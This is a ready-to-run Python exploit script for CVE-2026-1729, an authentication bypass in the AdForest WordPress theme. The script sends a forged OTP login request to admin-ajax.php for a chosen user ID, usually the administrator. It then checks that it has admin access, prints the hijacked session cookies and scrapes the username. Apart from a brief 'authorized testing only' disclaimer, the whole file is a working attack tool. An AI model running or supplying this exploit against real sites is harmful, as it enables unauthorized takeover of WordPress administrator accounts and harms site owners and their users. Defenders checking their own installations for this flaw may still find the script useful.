#!/usr/bin/env python3
"""
CVE-2026-1729 - AdForest WordPress Theme Authentication Bypass Exploit
====================================================================

Simple PoC for AdForest WordPress Theme authentication bypass vulnerability.
Allows direct access to WordPress admin without credentials.

Usage:
    python exploit.py https://target-site.com [user_id]

Author: f3ds cr3w est. 2oo2
License: For educational/authorized testing only
"""

import requests
import sys
import argparse
from urllib.parse import urljoin

def exploit_wordpress(target_url, user_id=1):
    """Exploit CVE-2026-1729 to gain admin access"""
    
    session = requests.Session()
    session.headers.update({
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    })
    
    # Target the vulnerable AJAX endpoint
    ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    
    # Exploit payload
    data = {
        'action': 'sb_login_user_with_otp',
        'user_id': user_id,
        'otp_code': 'anything',  # Any value bypasses authentication
        'remember': '1'
    }
    
    print(f"[+] Target: {target_url}")
    print(f"[+] Targeting user ID: {user_id}")
    print(f"[+] Sending exploit to: {ajax_url}")
    
    try:
        # Send exploit request
        response = session.post(ajax_url, data=data, timeout=10)
        
        if response.status_code != 200:
            print(f"[-] Exploit failed - HTTP {response.status_code}")
            return False
        
        # Test admin access
        admin_url = urljoin(target_url, '/wp-admin/')
        admin_response = session.get(admin_url, timeout=10)
        
        if admin_response.status_code == 200 and 'wp-admin' in admin_response.url:
            print(f"[+] SUCCESS! Admin access granted")
            print(f"[+] Admin URL: {admin_url}")
            print(f"[+] Session cookies: {dict(session.cookies)}")
            
            # Get current user info
            profile_url = urljoin(target_url, '/wp-admin/profile.php')
            profile_response = session.get(profile_url, timeout=5)
            
            if profile_response.status_code == 200:
                # Extract username
                import re
                username_match = re.search(r'user_login.*?value="([^"]+)"', profile_response.text)
                if username_match:
                    username = username_match.group(1)
                    print(f"[+] Logged in as: {username}")
            
            return True
        else:
            print(f"[-] Failed to access wp-admin")
            return False
            
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def main():
    parser = argparse.ArgumentParser(description='CVE-2026-1729 AdForest Exploit')
    parser.add_argument('target_url', help='Target WordPress site URL')
    parser.add_argument('--user-id', type=int, default=1, 
                       help='User ID to target (default: 1)')
    
    args = parser.parse_args()
    
    print("CVE-2026-1729 - AdForest WordPress Authentication Bypass")
    print("=" * 55)
    print("WARNING: For authorized testing only!")
    print("=" * 55)
    
    if exploit_wordpress(args.target_url, args.user_id):
        print("\n🎯 Exploit completed successfully!")
        print("You now have admin access to the WordPress site.")
    else:
        print("\n❌ Exploit failed")
        print("Possible reasons:")
        print("- AdForest theme not installed")
        print("- Theme version not vulnerable")
        print("- Additional security measures in place")

if __name__ == '__main__':
    main()